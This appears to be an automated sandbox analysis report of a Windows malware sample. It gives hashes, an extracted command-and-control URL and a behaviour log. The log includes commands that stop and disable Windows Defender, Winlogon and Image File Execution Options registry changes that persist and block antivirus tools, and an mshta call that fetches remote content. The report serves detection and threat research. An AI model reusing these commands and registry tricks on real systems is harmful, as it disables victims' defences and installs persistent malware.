Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
06/07/2024, 06:21
Static task
static1
Behavioral task
behavioral1
Sample
27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe
-
Size
2.3MB
-
MD5
27891f97676249d11cf7cce5af1d6466
-
SHA1
0d6b9138acdb589e945eb659604e828b6e613c67
-
SHA256
67d02e82efdc1032b8bf7231fd4ab8a21b161229f531c39b501e1877beceb09e
-
SHA512
c39fcc696c73ee7d72f21af34919512825734fc996fb60570475df3693509bc27d76a764f01cfc33e9857b33a7c4d249d4ad9d27ab51e289abee9731dab203b6
-
SSDEEP
49152:e5FHC2MmVOlOoqvH6rp1NcUczjRO4Ye47YfW5I5GWMo/4aHRNpoRxjt:dWVuVqf6V1NcUczjfBGeF/4aHRNpoLt
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DJVPRFTV&2=i-s&3=106&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\fvwusu.exe" fvwusu.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 12 1752 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 20 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe fvwusu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe fvwusu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe fvwusu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe fvwusu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" fvwusu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" fvwusu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" fvwusu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" fvwusu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" fvwusu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe fvwusu.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 2660 fvwusu.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1176 sc.exe 2988 sc.exe 2604 sc.exe 2004 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2660 fvwusu.exe Token: SeShutdownPrivilege 2660 fvwusu.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe 2660 fvwusu.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2660 fvwusu.exe 2660 fvwusu.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1356 wrote to memory of 1176 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 85 PID 1356 wrote to memory of 1176 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 85 PID 1356 wrote to memory of 1176 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 85 PID 1356 wrote to memory of 2988 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 86 PID 1356 wrote to memory of 2988 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 86 PID 1356 wrote to memory of 2988 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 86 PID 1356 wrote to memory of 2660 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 89 PID 1356 wrote to memory of 2660 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 89 PID 1356 wrote to memory of 2660 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 89 PID 1356 wrote to memory of 636 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 90 PID 1356 wrote to memory of 636 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 90 PID 1356 wrote to memory of 636 1356 27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe 90 PID 2660 wrote to memory of 2604 2660 fvwusu.exe 92 PID 2660 wrote to memory of 2604 2660 fvwusu.exe 92 PID 2660 wrote to memory of 2604 2660 fvwusu.exe 92 PID 2660 wrote to memory of 2004 2660 fvwusu.exe 93 PID 2660 wrote to memory of 2004 2660 fvwusu.exe 93 PID 2660 wrote to memory of 2004 2660 fvwusu.exe 93 PID 2660 wrote to memory of 1752 2660 fvwusu.exe 96 PID 2660 wrote to memory of 1752 2660 fvwusu.exe 96 PID 2660 wrote to memory of 1752 2660 fvwusu.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe"1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:1176
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2988
-
-
C:\Users\Admin\AppData\Roaming\fvwusu.exeC:\Users\Admin\AppData\Roaming\fvwusu.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2004
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DJVPRFTV&2=i-s&3=106&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- Blocklisted process makes network request
PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\27891F~1.EXE" >> NUL2⤵PID:636
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD527891f97676249d11cf7cce5af1d6466
SHA10d6b9138acdb589e945eb659604e828b6e613c67
SHA25667d02e82efdc1032b8bf7231fd4ab8a21b161229f531c39b501e1877beceb09e
SHA512c39fcc696c73ee7d72f21af34919512825734fc996fb60570475df3693509bc27d76a764f01cfc33e9857b33a7c4d249d4ad9d27ab51e289abee9731dab203b6